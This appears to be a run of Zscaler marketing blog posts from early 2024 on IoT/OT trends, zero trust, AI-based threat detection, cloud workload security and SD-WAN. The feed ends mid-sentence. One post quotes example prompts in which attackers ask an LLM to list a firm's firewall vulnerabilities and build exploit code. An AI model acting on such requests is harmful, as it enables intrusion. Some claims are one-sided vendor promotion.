No 2024 predictions blog post would be complete without mention of the topic on everyone’s lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT devices is inevitable. It will only improve as time passes, increasing the number of autonomous decisions made without human oversight. This can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it can also be a risk if mishandled.

5G and other WAN connectivity will evolve to meet the needs of IoT/OT

It seems we’ve been hearing about 5G forever, but it’s now starting to truly gain traction in the workplace as a new way to connect devices via the internet with minimal latency and without requiring local network infrastructure. And it’s not alone: newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront. This simply means we’re able to deploy sensors and other kinds of IoT devices in more locations, including remote and mobile ones, growing the number of potential use cases for the technology.

Digital twins will still serve as proving grounds

The accelerated growth in the number of sensors continues to cultivate the use of digital twins: virtual representations of real-world systems that help us visualize and improve them remotely. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we’re monitoring. This will enable us to drive resource optimization and efficiency, and pave the way for the adoption of more sustainable systems.
Taking all of these developments in aggregate, it’s plain to see that when it comes to IoT and OT growth, ‘we ain’t seen nothing yet’! As with all technological advances, there’s the potential that they will make our lives better and our businesses more efficient and profitable. At the same time, it’s vital to make security consideration number one when planning their deployment, especially for devices that talk to the internet. This brings us to the flip side of these predictions: the challenges they pose.

Data privacy

The combination of ubiquitous sensors and the rise of AI making use of the data they collect naturally leads us to consider data privacy. Regulations around the world, perhaps most famously the EU’s GDPR, ensure that privacy is a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for potentially nefarious uses.

Ransomware on the (continued) rise

As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, by over 37% in fact. At the same time, it’s becoming easier than ever to launch such attacks, aided by readily available AI and Ransomware-as-a-Service (RaaS) kits.

The firmware problem

Remember earlier when I asked if you knew how many devices you have deployed? Here’s another one for you: of those devices, how many have up-to-date firmware? Do you even know what firmware they’re running in order to establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability management.
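Answering the firmware questions above starts with an inventory. As a toy sketch (hypothetical device models and versions, not a real Zscaler feature), comparing each device's reported firmware against the latest known release for its model is a straightforward version comparison:

```python
# Illustrative sketch: flag devices running firmware older than the latest
# known release for their model. All names and versions are made up.

LATEST_FIRMWARE = {"cam-x200": "3.4.1", "thermostat-t9": "2.0.0"}

def version_tuple(v):
    """Turn a dotted numeric version string into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))

def outdated_devices(inventory):
    """inventory: iterable of dicts with 'id', 'model', 'firmware' keys."""
    stale = []
    for dev in inventory:
        latest = LATEST_FIRMWARE.get(dev["model"])
        if latest and version_tuple(dev["firmware"]) < version_tuple(latest):
            stale.append((dev["id"], dev["firmware"], latest))
    return stale

devices = [
    {"id": "lobby-cam", "model": "cam-x200", "firmware": "3.2.0"},
    {"id": "hvac-1", "model": "thermostat-t9", "firmware": "2.0.0"},
]
print(outdated_devices(devices))  # → [('lobby-cam', '3.2.0', '3.4.1')]
```

The hard part in practice is not the comparison but populating the inventory at all, which is exactly the visibility gap the post describes.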
A single compromised device could be all an attacker needs to begin their hunt for more damage to cause or data to steal.

The ongoing risks presented by legacy security

As the cybersecurity industry continues to incessantly point out, traditional security technology practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door to lateral movement across networks and geographical boundaries, giving bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger. All of these challenges and more point to one conclusion: organizations must adopt a zero trust security architecture to protect the IoT and OT devices they will inevitably deploy this year.

Conclusion

On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit, we must put security first. This doesn’t mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust. If you’re new to zero trust and want to learn more, we’d like to welcome you to one of our monthly introductory live webinars, where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else. Click here and search ‘start here’ to find the next session to sign up for. Tue, 06 Feb 2024 01:00:02 -0800 Simon Tompson

Why Firewalls and VPNs Give You a False Sense of Security

Firewalls and VPNs were once hailed as the ultimate solutions for robust enterprise security, but in today’s evolving threat landscape, organizations face a growing number of breaches and vulnerabilities that are outpacing these solutions.
Today, the world we work in looks very different from the on-premises era as industries transform how and where work gets done. Firewalls and VPNs are crumbling pillars of a bygone era. They provide a false sense of security because they come with significant weaknesses that put companies at risk—weaknesses that are only realized when embracing digital transformation. Innovation in generative AI, automation, and IoT/OT technologies across industries is set to continue breaking barriers in 2024. This innovation also opens the door for attackers to automate phishing campaigns, craft evasive malware, reduce the development time of threats using AI, and even sell Ransomware-as-a-Service (RaaS). With the growing severity and number of breaches, there’s heightened concern that VPN vulnerabilities will leave the door open for attackers. According to a Cybersecurity Insiders survey, nearly 50% of organizations experienced VPN-related attacks between July 2022 and July 2023, and 90% of organizations are concerned about attackers exploiting third-party vendors to gain backdoor access to their networks through VPNs. It’s becoming clear that even the largest organizations with advanced firewalls still fall victim to breaches. Curious about some of the reasons firewalls and VPNs are letting organizations down? Read on.

A thinner sheet of protection across a larger attack surface

VPNs and firewalls extend the network, increasing the attack surface with public IP addresses as they connect more users, devices, locations, and clouds. Users can now work from anywhere with an internet connection, further extending the network. The proliferation of IoT devices has also increased the number of Wi-Fi access points across this extended network, including that seemingly harmless Wi-Fi-connected espresso machine needed for a post-lunch boost, creating new attack vectors to exploit.
Perimeter-based architecture means more work for IT teams

More doesn’t mean better when it comes to firewalls and VPNs. Expanding a perimeter-based security architecture rooted in firewalls and VPNs means more deployments, more overhead costs, and more time wasted for IT teams, but less security and less peace of mind. Pain also comes in the form of degraded user experience and satisfaction with VPN technology across the entire organization due to backhauled traffic (72% of organizations are slightly to extremely dissatisfied with their VPN experience). Other challenges, like the cost and complexity of patch management, security updates, software upgrades, and constantly refreshing aging equipment as an organization grows, are enough to exhaust even the largest and most efficient IT teams. The bigger the network, the more operational complexity and time required.

VPNs and firewalls can’t effectively guard against today’s threat landscape

VPNs and firewalls deployed to protect and defend network access behave a lot like a security guard who sits at the front of a store to stop theft. Consider the parallels:

- A security guard is stationed at the front door of a valuable store, tasked with identifying and stopping attacks, but can’t monitor all entrances at the same time. Likewise, firewalls and VPNs are deployed at key access points to an organization’s network, but can’t stop all the threats across every access point.
- Once an attacker gets past the guard, they get access to the entire store. Likewise, firewalls and VPNs permit lateral threat movement by placing users and entities onto the network.
- A guard’s 1:few threat detection can’t scale unless you hire a lot of security guards to monitor all entrances. Likewise, firewalls and VPNs can’t inspect encrypted traffic and enforce real-time security policies at scale.
- Guards can be slow, tired, expensive to hire, or late for their shift, and present a number of other issues that allow threats to go undetected and unanswered. Likewise, firewalls and VPNs suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more.

Much like a lone security guard, VPNs and firewalls can help mitigate some risk, but they can’t keep up with the scale and complexity of today’s cybercrime. Your network is extending exponentially as you digitally transform your organization. With constant attacks on the horizon and a thinner cover of protection, how many million security guards can you hire?

The Zero Trust Exchange delivers on the promise of security

Unlike network-centric technologies such as VPNs, a zero trust architecture minimizes your attack surface and connects users directly to the apps they need, without putting anyone or anything on the network as a whole. Zscaler delivers zero trust with its cloud native platform: the Zscaler Zero Trust Exchange. The Zero Trust Exchange starts with the premise that no user, workload, or device is inherently trusted. The platform brokers a secure connection between a user, workload, or device and an application, over any network and from anywhere, by evaluating identity, app policies, and risk. As threats grow more dangerous, we can’t rely on a single security guard to keep everybody out anymore. VPNs and firewalls were designed to make organizations feel secure, but with today’s evolving threats highlighting the cracks in these technologies, IT and security teams are left with a false sense of security. Truly secure digital transformation can only be delivered by implementing a zero trust architecture. The Zscaler Zero Trust Exchange is the comprehensive cloud platform designed to keep your users, workloads, IoT/OT, and B2B traffic safe in an environment where VPNs and firewalls can’t. If you’d like to learn more, join our webinar that serves as an introduction to zero trust and provides entry-level information on the topic.
Or, if you’d like to go a level deeper, consider registering for one of our interactive whiteboard workshops for free. Mon, 05 Feb 2024 14:26:59 -0800 Sid Bhatia

AI Detections Across the Attack Chain

Organizations face a constant barrage of cyberthreats. To combat these sophisticated attacks, Zscaler delivers layered security protections for more effective security postures across the four key stages of an attack: attack surface discovery, compromise, lateral movement, and data exfiltration. Heading into 2024, with all the buzz surrounding artificial intelligence (AI) over the past year, we are asked daily by prospects and customers, "Zscaler, how do you use AI to keep us safer?" For more on where we see AI and security headed in 2024, please see the blog from our founder, Jay Chaudhry. In this blog, we will explore a handful of examples of Zscaler AI use across the key stages of an attack, demonstrating how it can detect and stop threats, protect data, and make teams more efficient. Truth be told, we began adding AI detections to our portfolio some years ago to further bolster other detection methods, and it has paid off.

Stage 1: Attack surface discovery

While we will spend the better part of this blog discussing AI in other areas, the first stage of an attack involves attackers probing attack surfaces to identify potential weaknesses to be exploited. These are often things like VPN/firewall misconfigurations, vulnerabilities, or unpatched servers. We wholeheartedly suggest considering ways to cloak your currently discoverable applications behind Zscaler to immediately reduce your attack surface and your risk of successful attacks.

Stage 2: Risk of compromise

During the compromise stage, attackers exploit vulnerabilities to gain unauthorized access to employee systems or applications. Zscaler's AI-powered products help reduce the risk of compromise while prioritizing productivity.
AI-powered phishing/C2 prevention: We better detect and stop credential theft and browser exploitation from phishing pages with real-time analytics on threat intelligence from 300 trillion daily signals, ThreatLabz research, and dynamic browser isolation. This means our AI makes us even more efficient at detecting new phishing or C2 domains.

File-based attacks: We use AI in our cloud sandbox to ensure there is no tradeoff between security and productivity. Historically, in the case of the sandbox, a new file arrives and users must wait as it is analyzed, interrupting productivity. Our AI Instant Verdict in the sandbox prevents patient-zero infections by instantly blocking high-confidence malicious files using AI, eliminating the need to wait for analysis of files we deem very likely malicious. Our model fidelity is the result of years of ongoing training, analysis, and tuning iterations based on over 550 million file samples.

AI to block web threats: Additionally, Zscaler's AI-powered browser isolation blocks zero-day threats while ensuring employees can access the right sites to get their jobs done. URL filtering is effective in keeping users safe, but given that sites are either allowed or blocked, sometimes sites that are blocked are safe and needed for work. This is a productivity drain, as users cannot access legitimate sites for work, resulting in unnecessary helpdesk tickets. AI Smart Isolation determines when a site might be risky and opens it in isolation. This means organizations don't have to overblock sites to support productivity and can still maintain a strong web security posture.

Stage 3: Lateral movement

Once inside an organization, attackers attempt to move laterally to gain access to sensitive data. Zscaler's AI innovation reduces the potential blast radius by employing automated app segmentation, based on analysis of user access patterns, to limit lateral movement risk.
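The access-pattern idea behind automated app segmentation can be illustrated with a toy calculation. This is a sketch under stated assumptions (the function, threshold, and numbers are ours for illustration), not Zscaler's actual algorithm:

```python
# Toy sketch of access-pattern-driven segmentation: when only a small
# fraction of the workforce actually uses an app, propose a segment
# restricted to the observed users. Threshold is an illustrative assumption.

def propose_segment(app, observed_users, workforce_size, max_ratio=0.25):
    """Suggest an app segment when observed usage is a small slice of the workforce."""
    ratio = len(observed_users) / workforce_size
    if ratio <= max_ratio:
        return {
            "app": app,
            "allowed_users": sorted(observed_users),
            "blast_radius_reduction": f"{1 - ratio:.0%}",
        }
    return None  # broadly used app; segmentation gains little

finance_users = {f"user{i}" for i in range(250)}
segment = propose_segment("finance-app", finance_users, workforce_size=4500)
print(segment["blast_radius_reduction"])  # → 94%
```

With 250 observed users out of 4,500 employees, restricting access to the observed set shrinks the pool of accounts that could ever reach the app by roughly 94 percent.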
For instance, if we see only 250 of 4,500 employees accessing a finance application, we will use this data to automatically create an app segment that limits access to only those 250 employees, reducing the potential blast radius and lateral movement opportunity by ~94 percent.

Stage 4: Data exfiltration

The final stage of an attack involves the unauthorized exfiltration of sensitive data from a company. Zscaler uses AI to let companies deploy data protections faster. With AI-driven data discovery, organizations no longer struggle with the time-consuming tasks of data fingerprinting and classification that delay deployment. Innovative data discovery automatically finds and classifies all data out of the box. This means data is classified as sensitive immediately, so it can be protected right away from potential exfiltration and data breaches.

Zscaler's AI-driven security products provide organizations with robust protection across the four key stages of an attack. We also rely on AI to deliver cybersecurity maturity assessments as part of our Risk360 cyber risk management product. Rest assured, we are busy thinking, building, and adding new AI capabilities every day, so there is more to come, as AI-powered security is becoming indispensable in safeguarding organizations against cyberthreats. Fri, 26 Jan 2024 08:00:01 -0800 Dan Gould

2024 Predictions for Cloud Workload Cybersecurity

In 2023, the cloud security market underwent rapid change, with every aspect of the ecosystem (vendors, products, and infrastructure) going through significant transformation.
In 2024, expect cybersecurity for workloads (VMs, containers, and services) in public cloud environments to evolve further, as customers face the challenge of reconciling the business imperative of moving to the cloud as quickly as possible with their organization's compliance and security requirements. Accordingly, CIOs and CISOs expect their teams to build a security platform capable of consolidating point products, supporting multiple cloud environments (AWS, Azure, and GCP in particular), and scaling security services on demand through automation. Zero trust architectures are thus increasingly paving the way for real-time data protection, centralized policy enforcement, and the securing of cloud workloads. Here are the five key trends we believe will take hold in 2024.

1. Lateral movement of threats from on-premises environments into the cloud will increase

The cloud is home to organizations' most valuable assets: applications and data. Attackers are using innovative techniques to compromise an organization's on-premises network and move laterally into its cloud domain. These techniques are growing in popularity among threat actors because on-premises and public cloud environments remain inconsistently secured. An attack described by the Microsoft Security Research Team (source: MERCURY and DEV-1084: Destructive attack on hybrid environment) illustrates this trend. The threat actors first compromised two authorized accounts, then used them to manipulate the Azure Active Directory (Azure AD) Connect agent.
Two weeks before deploying the ransomware, the threat actors used a compromised, highly privileged account to gain access to the device on which the Azure AD Connect agent was installed. We assess with high confidence that the threat actors then used the AADInternals tool to extract the plaintext credentials of an authorized Azure AD account. These credentials were subsequently used to pivot from the compromised on-premises environment to the Azure AD environment.

Figure: On-premises compromise pivots to the public cloud

2. Serverless services will significantly expand the attack surface

Serverless functions offer enormous simplicity, allowing developers to focus exclusively on writing and deploying code without worrying about the underlying infrastructure. The adoption of microservices-based architectures will further drive the use of serverless functions thanks to their reusability and their ability to accelerate application development. However, serverless functions carry substantial security risk because they interact with a variety of input and event sources and frequently rely on HTTP or API calls to trigger actions. They also use cloud resources such as blob or block storage, employ queues to sequence interactions with other functions, and connect to devices. These touchpoints enlarge the attack surface, since many of them involve untrusted message formats and lack adequate monitoring or inspection for standard application-layer protection.

Figure: Serverless functions can access a whole stack of additional services, creating a large attack surface

3.
Identity-based security policies will be redefined for protecting public clouds
As workloads proliferate across public clouds, each CSP will offer its own, distinct identity capabilities. Unlike Active Directory for users, there is no one-size-fits-all solution in this context. IT departments will continue to wrestle with disjointed identity profiles for workloads on-premises, in private clouds, and in public clouds. That said, security teams in 2024 will continue to work with multiple workload attributes to build their security policies, and higher-level abstractions (such as custom tags) will gain more and more traction. This will promote consistency between cybersecurity and other resource management functions (billing, access control, authentication, and reporting) for cloud workloads.

Figure: User-defined tags are used to implement a zero trust architecture for securing cloud workloads

4. Organizations will evaluate and adopt cloud-based security platforms that support multiple public clouds
Hiring staff and building architectures tailored to securing each individual public cloud will drive security teams to find the solutions that suit them best. Organizations will trial CSP tools such as standalone cloud firewalls, but demand will grow for architectures that centralize the definition, enforcement, and remediation of cloud security policies. Only when cyber protection is delivered through a central platform can it be applied to all workloads, and not just a select few. 5.
Many CIOs do not want to have to choose between AWS, Azure, and GCP, so they need security tools that can handle the demands of multicloud environments. When it comes to vendor best practices, CIOs are keen to diversify their cloud infrastructure portfolios. This lets them reduce dependence on a single vendor, integrate infrastructure inherited through mergers and acquisitions, and use the best services from different public clouds, such as Google Cloud BigQuery for data analytics, AWS for mobile applications, and Oracle Cloud for ERP.

Figure: The AWS shared responsibility framework for protecting cloud resources. [Source]

The concept of "shared responsibility" for cybersecurity remains as popular as ever among cloud providers. In plain terms, it means the customer is responsible for implementing the security infrastructure that protects their cloud resources. Experienced IT leaders selecting a cybersecurity platform make sure it can support multiple public cloud environments. Customers have no interest in running separate security tools for each public cloud; they will instead use one platform for all their needs. Deploying workloads in the public cloud is nothing new in the enterprise world, but the security of cloud workloads is an increasingly pressing topic. While there are no definitive answers yet, there are clear signals about where organizations will head in 2024: toward zero trust, a concept that quickly delivers immediate benefits and provides a solid framework for the future of cloud workload security. Want to learn more about zero trust for cloud workloads? Click here for more perspectives from Zscaler.
This post is part of a blog series looking ahead at access and security in 2024. The next post in the series covers predictions around zero trust.

Forward-Looking Statements
This blog post contains forward-looking statements that are based on the beliefs and assumptions of our management and on information currently available to us. Forward-looking statements can be identified by words such as "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," or similar expressions that convey the uncertainty of future events or outcomes. These include, in particular, statements concerning predictions about the state of the cybersecurity industry in calendar year 2024 and our ability to capitalize on the associated market opportunities, as well as the expected benefits and increasing adoption of "as-a-service" models and zero trust architectures to combat cyberthreats, and the ability of artificial intelligence and machine learning to shorten detection and remediation response times and to proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions of the U.S. Private Securities Litigation Reform Act of 1995. They are subject to a number of risks, uncertainties, and assumptions, and a variety of factors could cause actual results to differ materially from the predictions made in this blog post.
In particular, this applies to security risks and developments of which Zscaler was unaware at the time this post was published, as well as to the assumptions underlying our predictions for the cybersecurity industry in calendar year 2024. Risks and uncertainties specific to Zscaler's business are set forth in our most recent Quarterly Report on Form 10-Q, filed with the Securities and Exchange Commission (SEC) on December 7, 2022, which is available on our website at  and on the SEC's website at . All forward-looking statements in this post are based on the limited information available to Zscaler as of the date of publication, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Thu, 25 Jan 2024 08:00:02 -0800 Sakthi Chandra

Zscaler Academy: Reflecting on 2023 and Soaring into 2024
2023 was a year of transformation and innovation for Zscaler Academy. We reimagined cybersecurity education, tailoring it to the evolving landscape of zero trust security. As we begin 2024, it's time to reflect on what we've achieved and show you what's on the horizon.

2023: Building the Pillars of Zero Trust Learning
New Training and Offerings: We revamped our curriculum, introducing the Zscaler for Users learning path and specializations in Data Protection, Cyberthreat Protection, and Workloads. Hands-on labs, live virtual training, and engaging workshops became the norm, bridging the gap between theory and practice. New Approach: We embraced a learner-centric approach, catering to diverse learning styles and preferences.
Self-paced e-learning, interactive webinars, and immersive workshops offered flexibility and depth, empowering individuals at all levels. Certification: We evolved our certification program, aligning it with the latest zero trust advancements, and introduced an industry-standard, third-party proctored certification exam. The Zscaler Digital Transformation Administrator (ZDTA) certification exam is the final step in the Zscaler for Users - Essentials learning path, and validates a security professional's understanding of deploying and implementing the Zscaler Zero Trust Exchange platform. Roadshows and Virtual Training: We took Zscaler Academy on the road, hosting virtual and in-person events like Zscaler Training Roadshows and Virtual Training workshops around the globe. These interactive sessions fostered connections, knowledge sharing, and a sense of community among Zscaler users and partners.

A Year of Bridging the Cybersecurity Skills Gap
Customers: We empowered customers to maximize the value of their Zscaler investments. Our training equipped administrators, security professionals, and end users with the skills to confidently navigate the Zero Trust Exchange. Partners: We supported our partners in their growth journey. The Partner Academy provided the knowledge and expertise needed to build successful Zscaler practices and deliver exceptional customer service. Workforce of the Future: We invested in the future by inspiring and equipping the next generation of cybersecurity professionals. Through the Zscaler Academic Alliance Program, our initiatives are helping close the cybersecurity skills gap and ensuring a talent pool prepared for the zero trust era.

The New Charter Era: What Awaits in 2024
Micro-Learning and Micro-Credentials: We're embracing bite-sized learning, offering micro-credentials for specific skills. This agile approach will allow you to stay ahead of the curve and acquire targeted knowledge on the go.
New Certifications: We'll be expanding our certification portfolio, introducing new paths that validate expertise in specific Zscaler solutions and emerging security domains. More Training Courses and Events: We'll continue to diversify our offerings, adding new training courses (like Ransomware Protection, Deception, Troubleshooting, and more), live workshops, and virtual events. Expect deeper dives into specific technologies, industry trends, and best practices. Personalized Learning: We're committed to personalization, using data and insights to tailor learning recommendations and experiences to your individual needs and goals.

The Future Is Zero Trust, and Zscaler Academy Is Your Guide
As we step into 2024, Zscaler Academy remains your trusted partner on your zero trust journey. We'll continue to innovate, adapt, and empower you with the knowledge and skills to thrive in the dynamic security landscape. Stay tuned for exciting announcements and updates! We're dedicated to making Zscaler Academy the leading destination for zero trust education, ensuring you're always prepared to secure your future in the age of zero trust. Join us in 2024! Let's keep learning, growing, and building a safer digital world together. Wed, 24 Jan 2024 08:00:01 -0800 Prameet Chhabra

Navigating the Intersection of Cybersecurity and AI: Key Predictions for 2024
This article also appeared in VentureBeat. Anticipating the future is a complex endeavor; however, I'm here to offer insights into potential trends that could shape the ever-evolving cybersecurity landscape in 2024. We engage with over 40% of Fortune 500 companies, and I personally have conversations with thousands of CXOs each year, which gives me a unique view into the possibilities that might impact the security landscape. Let's explore these potential trends and see what the future of cybersecurity might look like. 1.
Generative AI will increase ransomware attacks: The use of GenAI technologies will expedite the identification of vulnerable targets, enabling cybercriminals to launch ransomware attacks with greater ease and sophistication. Previously, when launching a cyberattack, hackers had to spend time identifying an organization's attack surface and the potential vulnerabilities that could be exploited in internet-facing applications and services. With the advent of LLMs, however, the landscape has dramatically shifted. Now, a hacker can simply ask a straightforward question like, "Show me vulnerabilities for all firewalls for [a given organization] in a table format." The next command could be, "Build me exploit code for this firewall," and the task at hand becomes significantly easier. GenAI can also help identify vulnerabilities among your supply chain partners and the optimal attack paths through them into your network. It's important to recognize that even if you strengthen your own estate, vulnerabilities may still exist at other entry points, potentially making them the easiest targets for attacks. The combination of social engineering exploits and GenAI technology will result in a surge of cyber breaches of greater quality, diversity, and quantity, creating a feedback loop of iterative improvement that makes these breaches even more sophisticated and challenging to mitigate. Defense strategy: Using the Zscaler Zero Trust Exchange, customers can make their applications invisible to potential attackers, reducing the attack surface. If you can't be reached, you can't be breached. 2. AI will be used to fight AI: We will witness a promising development in which security providers harness AI to combat the ever-evolving nature of AI-driven attacks. Enterprises generate a vast amount of logs containing signals that could indicate potential attacks.
However, isolating these signals in a timely manner has been challenging due to signal-to-noise issues. With the advent of GenAI technologies, we now have the capability to identify potential avenues of attack more effectively. By leveraging GenAI, we can enhance triage and protection measures by understanding which vulnerabilities hackers are likely to exploit, and we can detect attackers and exploits in near real time. As a result, cloud security providers will develop AI-powered tools to proactively prevent potential areas of exploitation. AI and ML tools also give us the ability to predict and identify the vulnerabilities in an organization that are most likely to be exploited, which will help reduce cyber breaches. Defense strategy: Zscaler is building tools such as breach predictors that can predict and prevent breaches, powered by communication logs. Before any breach happens there is always reconnaissance activity, and because Zscaler sits in the middle of all communications, we have visibility into potential threats. This allows us to determine whether a hacker has infiltrated an enterprise and, if so, suggest steps to prevent a breach. 3. The rise of firewall-free enterprises: Organizations are coming to the realization that despite significant investments in firewalls and VPNs, their security posture remains vulnerable. They understand that a true zero trust architecture has to be implemented. Recognizing the inherent security risks and false sense of security of firewall-based approaches, customers will move away from firewalls and VPNs as their main security technology. Over the next few years, firewalls will become as archaic as mainframes. Organizations are awakening to the need for a more comprehensive and effective cybersecurity strategy.
The coming years will witness a significant acceleration in the adoption and implementation of zero trust architecture and the rise of "firewall-free enterprises." This transformative shift represents a crucial inflection point in the cybersecurity landscape. Defense strategy: This shift reflects a changing approach to cybersecurity, driven by the understanding that a firewall-centric approach is ineffective against evolving threats, prompting customers to seek true Zscaler zero trust solutions. 4. Broader adoption of zero trust segmentation: The number one enabler of ransomware attacks is a flat network. Once hackers are on the network, they can easily move laterally, find high-value assets, encrypt them, and demand ransom. Organizations have been trying to implement network-based segmentation to eliminate lateral movement. I have talked to hundreds of CISOs but have yet to meet one who has successfully completed network-based segmentation or microsegmentation; it is too cumbersome to implement and operationalize. In 2023, hundreds of enterprises successfully implemented the initial phase of zero trust architecture. Moving into 2024, we anticipate broader adoption of zero trust-based segmentation. This approach simplifies implementation: instead of creating network segments, you use zero trust technology to connect a defined group of users or applications to a defined group of applications. Defense strategy: Zscaler offers zero trust segmentation in two areas: user-to-application segmentation and application-to-application segmentation. 5. Zero Trust SD-WAN will start to replace traditional SD-WAN: SD-WAN has helped enterprises save money by using the internet, a cheaper transport. But SD-WANs have not improved security, as they allow lateral threat movement. Zero Trust SD-WAN doesn't put users on the network; it simply makes a point-to-point connection between users and applications, eliminating lateral threat movement.
This protects enterprises from ransomware attacks. Zero Trust SD-WAN will emerge as an important technology for highly reliable, highly secure, and seamless connectivity. It also reduces overhead, since enterprises no longer have to worry about managing route tables. Zero Trust SD-WAN makes every branch office like an internet cafe or coffee shop: your employees can access any application without your having to extend the network to every branch office. Defense strategy: Zscaler offers a Zero Trust SD-WAN solution that is easy to implement with a plug-and-play appliance. 6. SEC regulations will drive far more active participation by board members and CFOs in cyber risk reduction: Recognizing the damage that cyber breaches can cause to businesses, these key stakeholders will engage more actively in cybersecurity initiatives and decision-making processes. The increased involvement of CFOs and boards of directors in cybersecurity underscores the recognition that it is not solely a CIO's or CISO's responsibility, but a vital element of overall organizational resilience and risk management. Newly introduced SEC disclosure requirements will serve as a catalyst for boards to become more engaged in driving cybersecurity initiatives in their companies. More companies will require at least one board member with a strong background in cybersecurity. Defense strategy: Through Zscaler Risk360, we provide a holistic risk score for an organization that highlights the factors contributing to your cyber risk and compares your risk score with your peers', with trends over time. In addition, Zscaler has added SEC disclosure reports generated by GenAI, leveraging the contributing factors used to compute your company's risk score. Mon, 22 Jan 2024 15:31:59 -0800 Jay Chaudhry

Zero Trust for Your Branch Offices
The technology industry has changed dramatically over the past five years.
Among the countless changes in how organizations use technology to gain a competitive edge, three major developments have had a profound impact:
Migration of applications from traditional data centers to the cloud (the breakthrough of SaaS)
Hybrid work models in which employees work from regional offices as well as remote locations
Growing use of IoT/OT devices in factories and branch offices
Many organizations are finding that limitations in their WAN infrastructure and gaps in network security leave them unable to keep pace with these three developments. Traditional SD-WANs expand the attack surface and facilitate lateral threat movement. They connect sites over site-to-site VPNs or routing overlays, establishing implicit trust that grants even compromised entities unrestricted access to critical business resources. On top of that, coarse-grained segmentation policies allow threats to move freely within the network. Given the rising number of threats and the growing use of IoT/OT devices, which are often invisible to the network, organizations must ensure their WAN infrastructure follows zero trust principles. Traditional WAN infrastructures consist of multiple point products such as routers, firewalls, and VPNs, which can create significant management headaches. Organizations restructuring their branches therefore need a solution built on a lean branch and a powerful cloud to reduce management overhead. Zscaler Zero Trust SD-WAN securely and simply connects branches, factories, and data centers entirely without VPNs, providing zero trust access for users, IoT/OT devices, and servers.
With Zero Trust SD-WAN, organizations can build a lean branch in which unnecessary equipment is replaced by a simple plug-and-play appliance that can be brought up over nothing more than an internet connection.

Figure 1: Traditional SD-WAN versus Zero Trust SD-WAN

Zero Trust SD-WAN eliminates business risk
Unlike traditional SD-WANs, which extend the network to remote sites, clouds, and external users, Zero Trust SD-WAN connects users, IoT/OT devices, and applications to the resources they are authorized to access, with no need for routing overlays. The result is a zero trust network that minimizes the attack surface and stops lateral threat movement. Because all traffic is routed through the Zscaler Zero Trust Exchange, there are no publicly reachable IP addresses or VPN ports for attackers to target. A recent Zscaler ThreatLabz report shows that IoT- and OT-based malware attacks have increased 400% since 2022, underscoring how important it is for organizations to improve visibility into, and the security of, the IoT/OT devices deployed on their networks. Unfortunately, these devices are often overlooked when administrators design security policies for branch users. Yet as the ThreatLabz report makes clear, they represent a critical threat vector. Zero Trust SD-WAN provides full device visibility, giving organizations a detailed view of all IoT/OT devices along with information about the applications they communicate with. Administrators also no longer need to create separate policies for users and devices, because the same policies can be applied consistently to both.

Figure 2: IoT device discovery and classification

Many organizations rely on server-to-client communication.
For example, a print server in a data center may need to send a print job to a remote printer in a branch office. With Zero Trust SD-WAN, organizations no longer need to worry about exposed service ports that an attacker could exploit to break into the network. All branch communication is handled through the Zero Trust Exchange, which brokers the connection between the print server and the remote printer. Extending zero trust security to all entities, including users, IoT/OT devices, and servers, raises security across the board.

Zero Trust SD-WAN replaces site-to-site VPNs
Traditional SD-WANs connect sites (e.g., branches, factories, and data centers) over IPsec VPN tunnels. Routing overlays let every device communicate with every other device, server, or application, ensuring reachability between users, devices, and applications, a property attackers can exploit to easily reach other resources on the network. With Zero Trust SD-WAN, branch traffic is forwarded directly to the Zero Trust Exchange, where Zscaler Internet Access (ZIA) or Zscaler Private Access (ZPA) policies can be applied for full security inspection and identity-based access control. Zero Trust SD-WAN greatly simplifies branch communication with a zero trust network overlay that provides flexible forwarding and straightforward policy management.

Figure 3: Replacing site-to-site VPNs

Zero Trust SD-WAN simplifies mergers and acquisitions
Bringing two separate companies together can yield greater efficiency, a stronger market presence, and other benefits. However, integrating new systems and routing domains into the existing environment is sometimes a slow, painstaking process that can drag on for months.
With Zscaler, the entire post-merger integration process can be much simpler and faster. Zero Trust SD-WAN communicates only with the Zero Trust Exchange, so routing domains at existing and acquired sites never need to be merged. By deploying Zero Trust SD-WAN at an acquired site, organizations can forward traffic to the Zero Trust Exchange, which brokers the connection and secures the communication. The result: everything works from day one, and new sites are onboarded within weeks or even days.

Figure 4: Post-merger and acquisition integration

How does it all work? Applications defined in the ZPA portal are assigned a synthetic IP address. As soon as a user initiates a connection to the new application via its synthetic IP, the Zero Trust SD-WAN in that branch sends the traffic to the Zero Trust Exchange. At the acquired site hosting the application, the App Connector (built into Zero Trust SD-WAN) initiates an inside-out connection to the Zero Trust Exchange. The Zero Trust Exchange then brokers the connection between user and application.

Conclusion
Organizations need a networking solution that protects them against today's increasingly frequent cyberthreats. Traditional SD-WANs, however, increase security risk and network complexity. Zero Trust SD-WAN, by contrast, brings zero trust principles to the WAN by securely connecting users, IoT/OT devices, and servers. To improve the security of branches, factories, and data centers, organizations must move from traditional flat networks with implicit trust to zero trust networks. Implementing Zero Trust SD-WAN delivers numerous benefits, such as
